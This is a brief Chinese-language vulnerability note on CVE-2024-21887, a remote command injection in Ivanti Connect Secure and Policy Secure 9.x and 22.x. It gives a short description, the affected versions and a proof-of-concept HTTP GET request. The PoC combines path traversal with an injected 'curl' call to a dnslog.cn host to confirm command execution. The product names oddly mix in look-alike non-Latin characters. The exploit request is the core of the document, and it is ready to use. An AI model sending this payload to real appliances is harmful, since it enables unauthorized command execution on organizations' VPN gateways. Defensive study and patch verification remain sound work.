CVE-2024-21887）Ivanti 远程命令注入漏洞

一、漏洞简介

Ivаｎti Cоnnесt Sесurе（9.х、22.х）和 Ivаnti Pоliсу Sесurе 的 Wеb 组件中存在一个命令注入漏洞，使得经过身份验证的管理员能够发送特别构建的请求并在设备上执行任意命令 。

二、漏洞影响

Ivаｎti Cоnnесt Sесurе v 9.х

Ivаｎti Cоnnесt Sесurе v 22.х

三、漏洞复现

POC

GET /api/v1/totp/user-backup-code/…/…/license/keys-status/%3bcurl%20z5i19y.dnslog.cn HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36
Connection: close
Accept-Encoding: gzip, deflate